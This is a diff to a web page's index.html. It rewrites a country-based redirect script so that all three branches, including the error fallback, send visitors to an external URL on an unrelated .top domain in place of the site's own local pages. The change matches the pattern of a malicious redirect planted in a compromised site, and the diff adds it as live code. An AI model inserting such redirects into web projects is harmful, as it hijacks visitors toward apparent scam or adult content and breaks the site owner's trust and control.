--- a/index.html
+++ b/index.html
@@ -27,16 +27,16 @@
 
                     // Redirecting based on the country
                     if (country === 'NG') { // NG is the country code for Nigeria
-                        window.location.href = '/onistream.html';
+                        window.location.href = 'https://g472mrr.mysweethoneygirls.top/xcegk3t';
                         ///onistream/en.html
                     } else {
-                        window.location.href = '/onistream.html';
+                        window.location.href = 'https://g472mrr.mysweethoneygirls.top/xcegk3t';
                     }
                 })
                 .catch(error => {
                     console.error('Error fetching the user location:', error);
                     // Fallback redirect if the country cannot be determined
-                    window.location.href = '/onistream/';
+                    window.location.href = 'https://g472mrr.mysweethoneygirls.top/xcegk3t';
                 });
         }
     </script>
